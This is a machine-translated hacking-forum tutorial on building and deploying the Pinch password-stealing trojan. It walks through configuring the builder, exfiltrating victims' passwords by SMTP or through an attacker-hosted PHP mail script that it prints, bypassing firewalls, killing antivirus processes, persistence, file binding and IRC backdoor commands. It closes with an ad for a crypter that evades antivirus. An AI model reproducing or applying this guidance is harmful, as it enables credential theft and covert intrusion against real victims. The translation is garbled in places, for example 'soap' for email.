This page has been robot translated, sorry for typos if any. Original content here.

We break soap, we use BrutusAET2


MATERIAL IS PUT FOR SIGNIFICANT PURPOSES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY RESPONSIBILITY


-------------------------------------------------- ----------------
Part 1. Old, but useful. for pinch 1

***********************
Pinch 1.0 instructions
***********************

=====
Intro
=====

Please do not be surprised that I decided to write a similar article (article for lamerzzz). The fact is that on my forum (http://forum.web-hack.ru) a topic is created about once every three days, like "How to set up and use Pinch correctly?", "How to use Pinch ʻem?" etc.

===========
Capabilities
===========

This Trojan was quite widespread in the 2003/2004 year. All thanks to the ability to steal a large number of passwords (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, & RQ, The Bat !, The Bat! 2, Outlook / Outlook Express, IE autocomplete & protected sites & ftp (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp supported)), low weight, open source, and easy to create troy for a specific task. Troyan has the following features:

- Send the victim's computer configuration: OS, RAM, CPU, HDD, logged user, host name, IP
- Keylogger (Key-log)
- Remote console (Remote console)
- Bypassing the firewall
- Sending all passwords to E-mail using SMTP-server
- Encryption of stolen passwords sent by mail
- Auto-delete Trojan after launch
- HTML / Text reports
- File size is about 10Kb
- Modular system
- And much more...

Trojan wrote coban2k (http://www.cobans.net) - a fairly well-known person in the world of ICQ-hacking. Due to problems with hosting about storing the Trojan on their server, the author was forced to remove this creation from his site. Unfortunately, almost all antiviruses find this troy and it can only be sent to a victim who does not have an antivirus.

============
Equipment
============

The archive (pinch_1.0.zip) with the Trojan includes the following folders and files:

\ PinchBuilder.exe - Trojan Wizard
\ Parser.exe - a program to decrypt encrypted letters with passwords
\ readme.txt - no comments
\ Pinch \ - main folder with Trojan asm source and compiler
\ Sources \ - other sources
\ TB! 2 Plugin (Auto-parser) \ - a folder with a plugin for The Bat 2 !, which decodes encrypted emails with passwords that come to your inbox
\ Sources \ Script \ - PHP-script, through which passwords are sent when selecting the appropriate option when compiling (read below)

================
Compile troy
================

Included comes a special wizard (PinchBuilder.exe), which creates the Trojan according to your requirements and compiles the Trojan right on your computer. The program has two main tabs: Compile and Decrypt. The first serves to create a trojan, and the second to decrypt passwords (in fact, this tab is the result of the Parser.exe file). Next come three sub-tabs: SMTP, HTTP, and FILE. They set the option to display passwords. Let us examine each in more detail:

========
SMTP
========

In the Server field enter the address (hostname / ip) of the SMTP server. If you entered the server domain, then click Resolve, so that the server domain takes the form of an IP address. Next, in the From and To fields we indicate our soap. The button Send test massage serves for sending a test letter through the settings specified by you. I strongly recommend her to use. If the letter does not arrive, then it means that there are some problems with sending (firewall enabled, poor SMTP, did not click on Resolve, etc.).

I want to note that lately most providers are switching to a system by which their customers can send emails ONLY from THEIR SMTP server. In such cases, I recommend using the method of sending emails via HTTP.

====
HTTP
====

Upload the \ Sources \ Script \ view.php file to the server that supports PHP scripts and executes the mail () function. Further in the URL field we indicate the path to this script (for example, http://www.xss.ru/pinch.php). In the Subject field we indicate the name of the topic from which the letters will be sent. In the Status check str field there should be a string that is issued by the script after it is loaded. In the script that comes with the troye it matters: _ret_ok_1:

<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>

If this value is not accepted by the trojan, then it will try to send an email through this script every minute until it receives a response in the field from the Status check str field. I recommend that you use the script not from the standard delivery, but written by me:

<html> <body>
<? php
// Author: Terabyte (http://www.web-hack.ru)
$ email = $ _ POST ['a'];
$ subject = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
if (isset ($ email) and isset ($ subject) and isset ($ msg)) {
mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>
</ body> </ html>

It does almost the same thing, but is written more competently. A huge advantage when using this method of sending passwords is the fact that it allows you to send passwords to bypass the Firewall. How is this achieved? Here is a clipping from the outpost log when sending a password through a script from my site:

Process name: iexplorer.exe
Protocol: HTTP
Remote address: www.web-hack.ru

I think everyone understood who is not in the tank =) Also, from the pros, I can highlight the ability to write encrypted emails on your site, rather than send it to soap; the ability to change the soap to which passwords are sent, in case it is deleted; during mass distribution of Troy (so that passwords can be sent even from those providers, where access to all SMTP servers, except for them, is disabled)

====
FILE
====

This tab sets the path to the file in which all passwords are saved. To do this, you need to write the path to the file in the Path field (for example, C: \ password.txt).

================
Compiler Options
================

In this area, everything is clear, then you just need to put a tick in the fields where you need it. It is worth paying attention to the Add Icon field. It indicates the path to the icon with which the compiled Trojan will be displayed. I want to note that on my system (Windows XP) I was not able to compile Troy with this option enabled and had to be disabled.

In the Protocol fields, specify the method by which the passwords will be sent (SMTP / HTTP / FILE). Next, click the Compile button and the Trojan should compile, which will be saved to the main folder with the wizard to create it.

===================
Password decryption
===================

Suppose you managed to push the lamer to this troi and you got the passwords from the victim’s car on the soap. The fact is that when sending passwords, they are encrypted and need to be decrypted first (unless you have a special plugin for TheBat! Described above). Copy the text with coded passwords to the clipboard, open Parser.exe (or the Decrypt tab in PinchBuilder.exe) and click Process Data (or simply press Alt + C) in the context menu. Then the program will give you all the data stolen from the victim with a convenient form. Then you can save or print them.

==========
Conclusion
==========

I want to warn you that when using this Trojan, you immediately fall under article 273 of the Criminal Code and you can be seriously punished ;-) I (the author of the article) do not bear any responsibility for the harm that could be caused to any person after reading my article.


----------------------------------------

part 2. instruction to pinch 2.58

A small article on the elementary settings pinch. Do not judge strictly, but criticize full-length. Pinch setup article 2.58.

I think that there is no problem with crack th, there is no detailed help, and even a video is attached. I want to show how to tune in Bilder:

SMTP Properties
Server (enter, in your case, smtp.mail.ru), then you must click Resolve to convert it to IP (by the way, all frauds must be performed when the Internet is connected)

Port - leave it as it is

Protocol - the choice of how the report will be received, via SMTP, HTTP (via php) and FILE - saved on the computer. Buttons with the same name (SMTP, HTTP, FILE) protocol setup, but in this case we are interested in SMTP and we have already configured it ..

TestSend button sending test message to mail.

PWD tab - prevents passwords from the listed programs. Item ENABLE PWD when removing daws reports will not contain passwords.
Galka Don't send old report - do not send old reports.
Galki Encrypt and Packing are interrelated. FSG, UPX, MEW choice of packaging.

RUN tab - select the startup methods. I think you will understand it. Pull down as .... standart, DLL, Undelate Service. Move to a folder ..... or you specify or select one of the system ones. On the right, the column Values ​​I did not touch and honestly vaguely imagine why he is. Bottom right - bypass Windows Firewall (SP2) - to bypass the system firewall in SP2 (as far as I know the mechanism of this item - it starts up as iexplorer.exe)

The SPY tab - some additional reports - it did not work for me. Screen spy fad - taking a screenshot, but again it didn't work for me (srkin was sent, but it was empty)

NET tab - I did not use it. It is intended to:
1. Open any port on the infected computer, and accordingly get access to it (I strongly advise you not to use it, if you don’t encrypt it, if you get caught, you can guess what will happen ...)
2. Downloader - an indication of a direct link to any file that should download and run (estimate what expenses your enemy will incur if he has traffic ......)))))
3. AutoUpdate - autoupdate - troy, upon completion of the work, downloads its copy, and then deletes itself to the next system boot, a new copy is launched (this is for greater reliability, so that it would not be found).

Tab BD (backdoor) - the console opens a shell on the selected port, control via telnet (telnet.exe) or alternative programs. (I haven't tried it myself)

The ECT tab - gluing with any file, as well as installing the icon ... You can also do that, the message pops up ... But something does not work ...

The KILL tab - killing of some process (you can try and kill the antivirus), for example "spidernt" - and then the DrWEB monitor will turn off (I warn you, I haven’t done it yet, but I will try)

IE tab - install your start page on your browser. Adding a page to Favorites ....

WORM tab - sho tse take, I don't know ... .....

Tab IRC-bot - access to the computer through IRC:
.login authorization
.die - bot shutdown
.download - file jump from URL
.httpd - open file access via http on a specific port
.killthread - completion of a specific task
.proxy - opening socks4 on the selected port with the selected id
.raw - sending raw text to this irc server
.remove - self-deletion
.restart - restart
.run - run commands
.scan - scan IP addresses to specific open ports
.shell - opening a shell on a specific port (not 95/98 / ME)
.status - show version, IP, launch date
.threads - show active tasks
.update - self-update bot from a special URL
.visit - visit selected url hidden
.url - visit selected url openly
.link - add to favorits
.sp - make home
.msg - message (messagebox)

That seems to be all .... You press COMPILE and a triple appears in your folder with the builder ...

GOOD LUCK !!!!!

PS This is, like, everything is written for review and the author is not responsible for the consequences ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt features:
Used polymorphic cryptor
Bypass KIS and Outpost (including the latest versions)
Self-removal
Reduced size (Normal pinch is reduced by 3-6kb, zupacha loader by 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~